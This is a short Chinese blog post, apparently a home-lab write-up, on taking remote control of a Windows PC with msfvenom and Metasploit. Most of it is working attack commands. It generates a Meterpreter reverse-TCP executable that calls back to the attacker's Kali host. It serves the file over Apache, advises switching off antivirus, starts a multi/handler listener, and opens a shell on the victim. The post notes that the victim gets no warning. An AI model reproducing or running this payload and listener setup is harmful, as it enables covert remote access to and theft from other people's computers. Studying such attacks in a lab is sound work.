利用msfvenom远程控制

pAwD7Q0.png(NAT模式)在kali上先ifconfig得到kali的ip地址192.168.75.133
构建
`msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.75.133 lport=5000 -f exe -o /root/payload.exe

先转到/root
然后把这个文件放在apache的网站下

cd /root
`cp payload.exe /var/www/html

启动apache

systemctl start apache2
sysemctl status apache2

我这里用物理机win11登陆

在edge地址栏输入
kali的ip/payload.exe

会弹出一个框让你下载
(注意记得关杀毒软件)

接着在kali里输入
msfconsole
输入下面四条

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.75.133  # Kali 的 IP 地址
set lport 5000  # 监听的端口
exploit

会显示
pAwDLeU.png
然后再在物理机上运行刚刚下好的payload.exe

此时出现下图说明已经建立好链接
然后输入dir,就会出现物理机上的文件
pAwDOwF.png

输入shell和ipconfig

pAwDXo4.png

并且在kali上输入命令时,物理机不会有提示说正在被监听,正在被远程连接
因此这是很难注意到的危险

将生成的被控端放到网站上检测www.virustotal.com
pAwDvFJ.png

被标记成木马文件了

posted @ 2024-10-25 17:04  流枫无涯  阅读(5)  评论(0编辑  收藏  举报